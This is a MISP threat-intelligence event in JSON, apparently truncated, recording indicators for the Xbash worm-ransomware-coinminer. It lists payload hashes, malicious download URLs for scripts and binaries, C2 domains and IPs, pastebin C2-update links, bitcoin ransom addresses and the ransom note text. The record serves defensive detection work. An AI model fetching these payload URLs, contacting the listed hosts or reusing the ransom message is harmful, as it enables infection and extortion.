2528 lines
No EOL
92 KiB
JSON
2528 lines
No EOL
92 KiB
JSON
{
|
|
"Event": {
|
|
"analysis": "2",
|
|
"date": "2018-09-19",
|
|
"extends_uuid": "",
|
|
"info": "OSINT (expanded) - Xbash Combines Botnet, Ransomware, Coinmining in Worm that Targets Linux and Windows",
|
|
"publish_timestamp": "1537334515",
|
|
"published": true,
|
|
"threat_level_id": "3",
|
|
"timestamp": "1537334496",
|
|
"uuid": "5ba1d01f-27cc-438f-9cbc-4652950d210f",
|
|
"Orgc": {
|
|
"name": "CIRCL",
|
|
"uuid": "55f6ea5e-2c60-40e5-964f-47a8950d210f"
|
|
},
|
|
"Tag": [
|
|
{
|
|
"colour": "#a200ca",
|
|
"local": "0",
|
|
"name": "ms-caro-malware:malware-platform=\"Python\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#ffffff",
|
|
"local": "0",
|
|
"name": "tlp:white",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#00223b",
|
|
"local": "0",
|
|
"name": "osint:source-type=\"blog-post\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#0088cc",
|
|
"local": "0",
|
|
"name": "misp-galaxy:mitre-enterprise-attack-attack-pattern=\"Exploit Public-Facing Application - T1190\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#0088cc",
|
|
"local": "0",
|
|
"name": "misp-galaxy:mitre-enterprise-attack-attack-pattern=\"Standard Application Layer Protocol - T1071\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#0088cc",
|
|
"local": "0",
|
|
"name": "misp-galaxy:tool=\"Xbash\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#0088cc",
|
|
"local": "0",
|
|
"name": "misp-galaxy:threat-actor=\"Iron Group\"",
|
|
"relationship_type": ""
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "External analysis",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537333842",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "5ba1d038-785c-41d2-8712-4c5d950d210f",
|
|
"value": "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/",
|
|
"Tag": [
|
|
{
|
|
"colour": "#00223b",
|
|
"local": "0",
|
|
"name": "osint:source-type=\"blog-post\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"category": "External analysis",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537333843",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "5ba1d04d-25a0-455c-9ee7-45f3950d210f",
|
|
"value": "Unit 42 researchers have found a new malware family that is targeting Linux and Microsoft Windows servers. We can tie this malware, which we have named Xbash, to the Iron Group, a threat actor group known for previous ransomware attacks.\r\n\r\nXbash has ransomware and coinmining capabilities. It also has self-propagating capabilities (meaning it has worm-like characteristics similar to WannaCry or Petya/NotPetya). It also has capabilities not currently implemented that, when implemented, could enable it to spread very quickly within an organizations\u00e2\u20ac\u2122 network (again, much like WannaCry or Petya/NotPetya).\r\n\r\nXbash spreads by attacking weak passwords and unpatched vulnerabilities.\r\n\r\nXbash is data-destructive; destroying Linux-based databases as part of its ransomware capabilities. We can also find no functionality within Xbash that would enable restoration after the ransom is paid. This means that, similar to NotPetya, Xbash is data destructive malware posing as ransomware.\r\n\r\nOrganizations can protect themselves against Xbash by:\r\n\r\n Using strong, non-default passwords\r\n Keeping up-to-date on security updates\r\n Implementing endpoint security on Microsoft Windows and Linux systems\r\n Preventing access to unknown hosts on the internet (to prevent access to command and control servers)\r\n Implementing and maintaining rigorous and effective backup and restoration processes and procedures.\r\n\r\nPalo Alto Networks customers are protected against Xbash as outlined at the end of this post.\r\n\r\nBelow are some more specifics on Xbash\u00e2\u20ac\u2122s capabilities:\r\n\r\n It combines botnet, coinmining, ransomware and self-propagation\r\n It targets Linux-based systems for its ransomware and botnet capabilities\r\n It targets Microsoft Windows-based systems for its coinmining and self-propagating capabilities\r\n The ransomware component targets and deletes Linux-based databases\r\n To date, we have observed 48 incoming transactions to these wallets with total income of about 0.964 bitcoins meaning 48 victims have paid about US $6,000 total (at the time of this writing)\r\n However, as see no evidence that the paid ransoms have resulted in recovery for the victims\r\n In fact, we can find no evidence of any functionality that makes recovery possible through ransom payment.\r\n Our analysis shows this is likely the work of the Iron Group, a group publicly linked to other ransomware campaigns including those that use the Remote Control System (RCS), whose source code was believed to be stolen from the HackingTeam in 2015.",
|
|
"Tag": [
|
|
{
|
|
"colour": "#00223b",
|
|
"local": "0",
|
|
"name": "osint:source-type=\"blog-post\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"category": "Financial fraud",
|
|
"comment": "If Xbash successfully logs in to a service including MySQL, MongoDB, and PostgreSQL, it will delete almost all existing databases in the server (except for some databases that stored user login information), create a new database named \u00e2\u20ac\u0153PLEASE_READ_ME_XYZ\u00e2\u20ac\u009d, and insert a ransom message into table \u00e2\u20ac\u0153WARNING\u00e2\u20ac\u009d of the new database, as shown in Figure 4 and Figure 5. Send 0.02 BTC to this address and contact this email with your website or your ip or db_name of your server to recover your database! Your DB is Backed up to our servers!If we not received your payment,we will leak your database 1jqpmcLygJdH8fN7BCk2cwwNBRWqMZqL1 backupsql@pm.me",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537331367",
|
|
"to_ids": true,
|
|
"type": "btc",
|
|
"uuid": "5ba1d0a7-b470-45ff-ba90-27fb950d210f",
|
|
"value": "1jqpmcLygJdH8fN7BCk2cwwNBRWqMZqL1"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "zlibx",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537331799",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "5ba1d257-f6fc-4740-b3f8-28a2950d210f",
|
|
"value": "7a18c7bdf0c504832c8552766dcfe0ba33dd5493daa3d9dbe9c985c1ce36e5aa"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "Xbash",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537331800",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "5ba1d258-c978-467b-acc6-28a2950d210f",
|
|
"value": "0b9c54692d25f68ede1de47d4206ec3cd2e5836e368794eccb3daa632334c641"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "xapache",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537331800",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "5ba1d258-9f30-40cc-b608-28a2950d210f",
|
|
"value": "dbc380cbfb1536dfb24ef460ce18bccdae549b4585ba713b5228c23924385e54"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "libhttpd",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537331801",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "5ba1d259-3908-490a-947e-28a2950d210f",
|
|
"value": "5b790f02bdb26b6b6b270a5669311b4f231d17872aafb237b7e87b6bbb57426d"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "XbashX",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537331801",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "5ba1d259-08f8-485f-ac9b-28a2950d210f",
|
|
"value": "e59be6eec9629d376a8a4a70fe9f8f3eec7b0919019f819d44b9bdd1c429277c"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "XbashY",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537331801",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "5ba1d259-24bc-4aed-a9c2-28a2950d210f",
|
|
"value": "f808a42b10cf55603389945a549ce45edc6a04562196d14f7489af04688f12bc"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "rootv2.sh",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537331802",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "5ba1d25a-0a94-45e3-a624-28a2950d210f",
|
|
"value": "dcd37e5b266cc0cd3fab73caa63b218f5b92e9bd5b25cf1cacf1afdb0d8e76ff"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "owerv2.sh",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537331802",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "5ba1d25a-3294-4259-ba5a-28a2950d210f",
|
|
"value": "de63ce4a42f06a5903b9daa62b67fcfbdeca05beb574f966370a6ae7fd21190d"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "rootv2.sh",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537331803",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "5ba1d25b-0cd8-42b3-891c-28a2950d210f",
|
|
"value": "09968c4573580398b3269577ced28090eae4a7c326c1a0ec546761c623625885"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "r88.sh",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537331803",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "5ba1d25b-6a28-48a6-9413-28a2950d210f",
|
|
"value": "a27acc07844bb751ac33f5df569fd949d8b61dba26eb5447482d90243fc739af"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "tt.txt",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537331865",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "5ba1d299-3438-4286-a1ad-4737950d210f",
|
|
"value": "f888dda9ca1876eba12ffb55a7a993bd1f5a622a30045a675da4955ede3e4cb8"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "tg.jpg",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537331866",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "5ba1d29a-7290-41ea-bdb1-4f76950d210f",
|
|
"value": "31155bf8c85c6c6193842b8d09bda88990d710db9f70efe85c421f1484f0ee78"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "reg9.sct",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537331866",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "5ba1d29a-b8e8-46d8-b9c5-4381950d210f",
|
|
"value": "725efd0f5310763bc5375e7b72dbb2e883ad90ec32d6177c578a1c04c1b62054"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "m.png",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537331867",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "5ba1d29b-e3c8-48d7-b1a1-4ac9950d210f",
|
|
"value": "d7fbd2a4db44d86b4cf5fa4202203dacfefd6ffca6a0615dca5bc2a200ad56b6"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "tmp.jpg",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537331867",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "5ba1d29b-1d08-4090-82a2-47f7950d210f",
|
|
"value": "ece3cfdb75aaabc570bf38af6f4653f73101c1641ce78a4bb146e62d9ac0cd50"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "Downloading URLs",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537332429",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5ba1d4cd-2424-40e7-a047-48a4950d210f",
|
|
"value": "http://3g2upl4pq6kufc4m.tk/zlibx"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "Downloading URLs",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537332429",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5ba1d4cd-aaa0-4f57-93b1-4771950d210f",
|
|
"value": "http://e3sas6tzvehwgpak.tk/XbashY"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "Downloading URLs",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537332430",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5ba1d4ce-484c-4c15-8ce5-4d5f950d210f",
|
|
"value": "http://3g2upl4pq6kufc4m.tk/XbashY"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "Downloading URLs",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537332430",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5ba1d4ce-5a48-4f70-91c6-4ce9950d210f",
|
|
"value": "http://3g2upl4pq6kufc4m.tk/xapache"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "Downloading URLs",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537332430",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5ba1d4ce-db6c-4068-8334-4a3b950d210f",
|
|
"value": "http://3g2upl4pq6kufc4m.tk/libhttpd"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "Downloading URLs",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537332431",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5ba1d4cf-b984-4242-bafc-49d0950d210f",
|
|
"value": "http://xmr.enjoytopic.tk/l/rootv2.sh"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "Downloading URLs",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537332431",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5ba1d4cf-0f64-408b-8b8d-42a0950d210f",
|
|
"value": "http://xmr.enjoytopic.tk/l2/rootv2.sh"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "Downloading URLs",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537332432",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5ba1d4d0-bddc-4521-814d-473c950d210f",
|
|
"value": "http://xmr.enjoytopic.tk/l/r88.sh"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "Downloading URLs",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537332432",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5ba1d4d0-1d8c-424a-b2d8-4430950d210f",
|
|
"value": "http://xmr.enjoytopic.tk/12/r88.sh"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "Downloading URLs",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537332433",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5ba1d4d1-1698-491d-a555-4331950d210f",
|
|
"value": "http://e3sas6tzvehwgpak.tk/lowerv2.sh"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "Downloading URLs",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537332433",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5ba1d4d1-2518-4b2f-be8f-46e4950d210f",
|
|
"value": "http://3g2upl4pq6kufc4m.tk/r88.sh"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "Downloading URLs",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537332434",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5ba1d4d2-1cd0-4dbb-bb96-444e950d210f",
|
|
"value": "http://e3sas6tzvehwgpak.tk/XbashX"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "Downloading URLs",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537332434",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5ba1d4d2-98dc-4ef9-a073-4449950d210f",
|
|
"value": "http://png.realtimenews.tk/m.png"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "Downloading URLs",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537332434",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5ba1d4d2-39ec-4b98-ae74-42bb950d210f",
|
|
"value": "http://daknobcq4zal6vbm.tk/tt.txt"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "Downloading URLs",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537332435",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5ba1d4d3-4da0-43c6-a073-4820950d210f",
|
|
"value": "http://d3goboxon32grk2l.tk/reg9.sct"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "Domains for C2 Communication",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537332467",
|
|
"to_ids": true,
|
|
"type": "hostname",
|
|
"uuid": "5ba1d4f3-0ef4-44cb-8e2e-4fc6950d210f",
|
|
"value": "ejectrift.censys.xyz"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "Domains for C2 Communication",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537332467",
|
|
"to_ids": true,
|
|
"type": "hostname",
|
|
"uuid": "5ba1d4f3-ba24-4602-99bb-43fc950d210f",
|
|
"value": "scan.censys.xyz"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "Domains for C2 Communication",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537332468",
|
|
"to_ids": true,
|
|
"type": "hostname",
|
|
"uuid": "5ba1d4f4-fa84-48bf-a1b9-49b8950d210f",
|
|
"value": "api.leakingprivacy.tk"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "Domains for C2 Communication",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537332468",
|
|
"to_ids": true,
|
|
"type": "hostname",
|
|
"uuid": "5ba1d4f4-9b88-4f01-a225-42c6950d210f",
|
|
"value": "news.realnewstime.xyz"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "Domains for C2 Communication",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537332468",
|
|
"to_ids": true,
|
|
"type": "hostname",
|
|
"uuid": "5ba1d4f4-47dc-4ee5-a3eb-43e5950d210f",
|
|
"value": "scan.realnewstime.xyz"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "Domains for C2 Communication",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537332469",
|
|
"to_ids": true,
|
|
"type": "hostname",
|
|
"uuid": "5ba1d4f5-3b08-406a-8ad7-42cb950d210f",
|
|
"value": "news.realtimenews.tk"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "Domains for C2 Communication",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537332469",
|
|
"to_ids": true,
|
|
"type": "domain",
|
|
"uuid": "5ba1d4f5-50fc-4482-9ed4-4360950d210f",
|
|
"value": "scanaan.tk"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "Domains for C2 Communication",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537332470",
|
|
"to_ids": true,
|
|
"type": "hostname",
|
|
"uuid": "5ba1d4f6-5598-4a65-8dd5-44ff950d210f",
|
|
"value": "scan.3g2upl4pq6kufc4m.tk"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "Domains for C2 Communication",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537332470",
|
|
"to_ids": true,
|
|
"type": "hostname",
|
|
"uuid": "5ba1d4f6-4230-4c9b-80fe-4167950d210f",
|
|
"value": "scan.vfk2k5s5tfjr27tz.tk"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "Domains for C2 Communication",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537332471",
|
|
"to_ids": true,
|
|
"type": "hostname",
|
|
"uuid": "5ba1d4f7-a7c8-4c70-9fa5-47a1950d210f",
|
|
"value": "scan.blockbitcoin.tk"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "Domains for C2 Communication",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537332471",
|
|
"to_ids": true,
|
|
"type": "domain",
|
|
"uuid": "5ba1d4f7-66f4-4d3f-ae76-40a8950d210f",
|
|
"value": "blockbitcoin.com"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "IPs for C2 Communication",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537332488",
|
|
"to_ids": true,
|
|
"type": "ip-dst",
|
|
"uuid": "5ba1d508-02d8-44e3-a778-27c3950d210f",
|
|
"value": "142.44.215.177"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "IPs for C2 Communication",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537332489",
|
|
"to_ids": true,
|
|
"type": "ip-dst",
|
|
"uuid": "5ba1d509-5e58-4d73-bd76-27c3950d210f",
|
|
"value": "144.217.61.147"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "URLs for C2 Domain Updating",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537332511",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5ba1d51f-5344-4ba2-ae31-4bea950d210f",
|
|
"value": "https://pastebin.com/raw/Xu74Mzif"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "URLs for C2 Domain Updating",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537332511",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5ba1d51f-d130-4d8f-a046-4e27950d210f",
|
|
"value": "https://pastebin.com/raw/rBHjTZY6"
|
|
},
|
|
{
|
|
"category": "Financial fraud",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537332542",
|
|
"to_ids": true,
|
|
"type": "btc",
|
|
"uuid": "5ba1d53e-c4bc-4bf0-8245-4a22950d210f",
|
|
"value": "1Kss6v4eSUgP4WrYtfYGZGDoRsf74M7CMr"
|
|
},
|
|
{
|
|
"category": "Financial fraud",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537332542",
|
|
"to_ids": true,
|
|
"type": "btc",
|
|
"uuid": "5ba1d53e-b274-4731-abbb-4920950d210f",
|
|
"value": "1ExbdpvKJ6M1t5KyiZbnzsdQ63SEsY6Bff"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "Email Addresses in Ransom Messages",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537332575",
|
|
"to_ids": true,
|
|
"type": "email-dst",
|
|
"uuid": "5ba1d55f-2fcc-49ac-b905-4e51950d210f",
|
|
"value": "backupsql@protonmail.com"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "Email Addresses in Ransom Messages",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537332576",
|
|
"to_ids": true,
|
|
"type": "email-dst",
|
|
"uuid": "5ba1d560-0e08-460b-9909-480b950d210f",
|
|
"value": "backupsql@pm.me"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "Email Addresses in Ransom Messages",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1537332576",
|
|
"to_ids": true,
|
|
"type": "email-dst",
|
|
"uuid": "5ba1d560-2538-43e3-8bb2-4d1f950d210f",
|
|
"value": "backupdatabase@pm.me"
|
|
}
|
|
],
|
|
"Object": [
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "Paste or similar post from a website allowing to share privately or publicly posts.",
|
|
"meta-category": "misc",
|
|
"name": "paste",
|
|
"template_uuid": "cedc055c-78aa-49a4-bfd7-4cc30cecef12",
|
|
"template_version": "4",
|
|
"timestamp": "1537332652",
|
|
"uuid": "5ba1d5ac-1460-4ba2-9ff1-458e950d210f",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "paste",
|
|
"timestamp": "1537332652",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "5ba1d5ac-4b4c-486a-88ee-4b38950d210f",
|
|
"value": "scan.vfk2k5s5tfjr27tz.tk\r\nscan.blockbitcoin.tkh"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "username",
|
|
"timestamp": "1537332652",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "5ba1d5ac-4dd0-4d93-b667-4d80950d210f",
|
|
"value": "wfkfly"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "origin",
|
|
"timestamp": "1537332653",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "5ba1d5ad-9e90-4225-99a2-4679950d210f",
|
|
"value": "pastebin.com"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "url",
|
|
"timestamp": "1537332653",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5ba1d5ad-17d8-4d8b-8b63-4f23950d210f",
|
|
"value": "https://pastebin.com/raw/Xu74Mzif"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "Paste or similar post from a website allowing to share privately or publicly posts.",
|
|
"meta-category": "misc",
|
|
"name": "paste",
|
|
"template_uuid": "cedc055c-78aa-49a4-bfd7-4cc30cecef12",
|
|
"template_version": "4",
|
|
"timestamp": "1537332746",
|
|
"uuid": "5ba1d60a-9f28-434d-b03a-4b86950d210f",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "paste",
|
|
"timestamp": "1537332746",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "5ba1d60a-82f8-486e-99d5-4580950d210f",
|
|
"value": "142.44.215.177\r\n144.217.61.147"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "username",
|
|
"timestamp": "1537332747",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "5ba1d60b-7de0-4efe-bb0b-44ca950d210f",
|
|
"value": "wfkfly"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "origin",
|
|
"timestamp": "1537332747",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "5ba1d60b-8bb8-4e7a-a466-40fc950d210f",
|
|
"value": "pastebin.com"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "url",
|
|
"timestamp": "1537332747",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5ba1d60b-8930-46d0-a00b-4dc6950d210f",
|
|
"value": "https://pastebin.com/raw/rBHjTZY6"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "Paste or similar post from a website allowing to share privately or publicly posts.",
|
|
"meta-category": "misc",
|
|
"name": "paste",
|
|
"template_uuid": "cedc055c-78aa-49a4-bfd7-4cc30cecef12",
|
|
"template_version": "4",
|
|
"timestamp": "1537332851",
|
|
"uuid": "5ba1d673-e378-45e9-9d50-41c6950d210f",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "paste",
|
|
"timestamp": "1537332851",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "5ba1d673-8450-46fa-bc4e-4243950d210f",
|
|
